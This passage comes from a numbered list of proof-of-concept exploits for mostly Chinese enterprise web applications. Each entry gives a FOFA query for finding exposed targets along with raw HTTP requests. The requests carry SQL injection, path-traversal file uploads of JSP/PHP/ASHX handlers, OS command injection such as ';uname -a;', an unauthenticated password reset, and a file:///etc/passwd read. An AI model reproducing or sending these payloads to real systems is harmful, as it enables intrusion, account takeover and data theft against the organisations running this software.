User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=1


192. 富通天下外贸ERP (foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. Cockpit assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and request the file to get the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload the file, then request it:
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正 (FOUNDER) omnimedia news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--